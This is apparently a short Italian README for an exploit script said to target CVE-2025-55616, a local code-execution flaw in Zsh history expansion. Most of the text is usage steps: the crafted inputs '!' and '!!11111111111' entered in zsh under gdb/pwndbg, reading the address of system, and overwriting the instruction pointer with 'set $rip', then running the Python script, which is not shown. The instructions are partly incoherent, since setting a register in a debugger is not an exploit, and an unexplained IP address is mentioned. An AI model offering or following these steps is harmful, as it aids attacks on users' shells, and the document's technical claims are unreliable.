
Exploit per CVE-2025-55616, una RCE locale in Zsh tramite espressione di cronologia, che consente l'esecuzione arbitraria di codice con i privilegi dell'utente.
Per eseguire questo exploit: basta cambiare l'indirizzo IP e il "p system" nell'exploit, perché l'ho provato anche sul mio secondo laptop, e per cambiarlo esegui questo comando in gdb (soprattutto in pwndbg):
$ gdb zsh -f (nel terminale)
pwndbg> run -f
username% ! (username sarà il tuo, scrivi solo ! )
username% !!11111111111 (stessa cosa qui, scrivi solo !!11111111111 )
pwndbg> p system
dopo aver ottenuto l'indirizzo di "p system" basta cambiarlo in
b'set $rip = 0x7ffff7cc9110', (usa il tuo indirizzo di p system al posto di 0x7ffff7cc9110
Questa vulnerabilità consente ad attaccanti locali di ottenere l'Esecuzione di Codice Arbitrario (RCE) con i privilegi dell'utente che esegue il processo Zsh.
python3 CVE-2025-55616.py